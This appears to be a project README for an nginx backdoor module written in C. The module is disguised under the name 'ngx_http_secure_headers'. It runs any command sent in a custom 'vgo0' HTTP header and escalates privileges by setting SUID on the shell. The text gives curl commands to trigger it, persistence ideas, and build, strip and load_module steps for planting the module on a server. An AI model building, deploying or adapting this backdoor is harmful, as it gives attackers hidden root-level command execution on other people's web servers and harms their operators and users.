
Example nginx backdoor via malicious plugin

Primary LanguageC


Backdoor command execution as the nginx worker process (www-data)

This inserts itself as a handler during the NGX_HTTP_ACCESS_PHASE and looks for a specific header (backdoor in source)

When that header is found it executes the value of the header as a command and returns the output

curl -H "vgo0: whoami" localhost:8888

Using a header nginx already references would be more performant instead of having to seek the custom one.


A good spot might be to stack this in the auth header

During module init there is a phase where commands can usually be run as root depending on how nginx is getting started

This can be used to provide escalation persistance (SUID, Privileges, etc)

See ngx_http_secure_headers_init for very basic example

A poor mans escalation within command exec is provided via chmod u+s of the shell specified. This then gets passed to popen. On normal nginx teardown this will be reverted (chmod u-s)

It is roughly:

popen(escalate + " -p -c " + header_in + " 2>&1")

popen('/bin/sh -p -c whoami 2>&1')

popen is ultimately sh -c so it becomes something like:

/bin/sh -c '/bin/sh -p -c whoami 2>&1'

There are likely stealthier methods available

Setting escalate to "" avoids this


A sample dynamic and static version are provided in the docker folders compiled against 1.21.6

cd docker-dynamic
docker-compose up -d

curl -H "vgo: whoami" localhost:8888
Normal output

curl -H "vgo0: whoami" localhost:8888


This is version specific




Switch to directory


Configure - Dynamic

./configure --add-dynamic-module=/opt/nginx-backdoor --with-compat

Make - Dynamic

make modules

Get .so

strip -s objs/ngx_http_secure_headers_module.so
cp objs/ngx_http_secure_headers_module.so ...

Enable - Dynamic

Place .so on disk

Add to nginx config somehow (for dynamic):

load_module path/to/ngx_http_secure_headers_module.so;

service nginx restart


Configure - Static

Basic that works can be tested in docker (paths etc should match if replacing):

./configure --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --prefix=/usr/lib/nginx --add-module=/opt/nginx-backdoor

Make - Static


Get resulting

strip -s objs/nginx
cp objs/nginx